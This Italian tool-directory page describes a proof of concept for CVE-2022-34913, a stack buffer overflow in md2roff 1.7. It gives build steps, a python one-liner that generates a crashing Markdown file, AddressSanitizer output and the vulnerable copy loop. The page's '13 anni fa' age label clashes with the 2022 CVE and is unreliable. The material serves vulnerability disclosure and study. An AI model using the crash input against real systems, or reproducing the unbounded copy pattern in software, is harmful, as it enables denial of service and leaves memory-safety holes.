Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-34913 — Prova di concetto per CVE-2022-34913 | Kitploit
Strumenti/GitHubGitHub/halcy0nic/cve-2022-34913
Analisi delle VulnerabilitàExploitFuzzingPaper e RicercaApprendimento e FormazioneBinary Exploitation
GitHubhalcy0nic/cve-2022-34913

CVE-2022-34913

Prova di concetto per CVE-2022-34913

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione di CVE-2022-34913

md2roff 1.7 presenta un overflow del buffer basato sullo stack tramite un file Markdown contenente un gran numero di caratteri consecutivi da elaborare.

Riproduzione

Per riprodurre la vulnerabilità, dobbiamo scaricare una versione vulnerabile di md2roff (versione 1.7):

root@kitploit:~
git clone https://github.com/nereusx/md2roff.git
cd md2roff
git checkout 7fc373d25c91422454f081c8a717222d77fd7add
make

Una volta compilato il progetto, possiamo iniziare creando un file markdown malizioso con un grande buffer di caratteri ascii:

root@kitploit:~
python3 -c 'print("1"*5000)' > poc.md

Ora possiamo puntare md2roff al nostro file markdown malizioso e provocare un crash:

root@kitploit:~
./md2roff poc.md

L'esecuzione del comando precedente produrrà un segfault:

root@kitploit:~
segmentation fault  ./md2roff poc.md

Per comprendere meglio dove avviene l'overflow, ricompiliamo il progetto con address sanitizer (ASAN) aggiungendo -fsanitize=address alla variabile CFLAGS nel Makefile. Vogliamo anche che il compilatore memorizzi le informazioni della tabella dei simboli nell'eseguibile (flag -g) per aiutarci a determinare quale riga di codice ha prodotto il crash:

root@kitploit:~
CFLAGS = -std=c99 -fsanitize=address -g

Successivamente puliremo eventuali file obsoleti e ricompileremo il progetto:

root@kitploit:~
make clean
make

L'output di ASAN ci mostra che il codice sorgente vulnerabile si trova in md2roff.c, riga 1095:

root@kitploit:~
==180298==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdddcce7e0 at pc 0x556b5ebc39da bp 0x7ffdddcce5e0 sp 0x7ffdddcce5d8
WRITE of size 1 at 0x7ffdddcce7e0 thread T0
    #0 0x556b5ebc39d9 in md2roff /dev/shm/md2roff/md2roff.c:1095
    #1 0x556b5ebc620f in main /dev/shm/md2roff/md2roff.c:1394
    #2 0x7f3576046189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #3 0x7f3576046244 in __libc_start_main_impl ../csu/libc-start.c:381
    #4 0x556b5ebba3b0 in _start (/dev/shm/md2roff/md2roff+0x73b0)

Address 0x7ffdddcce7e0 is located in stack of thread T0 at offset 80 in frame
    #0 0x556b5ebbdb65 in md2roff /dev/shm/md2roff/md2roff.c:618

  This frame has 6 object(s):
    [32, 40) 'tt' (line 687)
    [64, 80) 'num' (line 1090) <== Memory access at offset 80 overflows this variable
    [96, 160) 'appname' (line 625)
    [192, 256) 'appsec' (line 625)
    [288, 352) 'appdate' (line 625)
    [384, 640) 'secname' (line 625)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /dev/shm/md2roff/md2roff.c:1095 in md2roff
Shadow bytes around the buggy address:
  0x10003bb91ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10003bb91cf0: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00[f2]f2 00 00
  0x10003bb91d00: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
  0x10003bb91d10: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
  0x10003bb91d20: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10003bb91d40: 00 00 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==180298==ABORTING

Codice sorgente vulnerabile:

root@kitploit:~
1093:    n = num;
1094:    while ( isdigit(*p) )
1095:        *n ++ = *p ++;

Riferimenti

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34913
  • https://owasp.org/www-community/vulnerabilities/Buffer_Overflow
Scarica lo strumento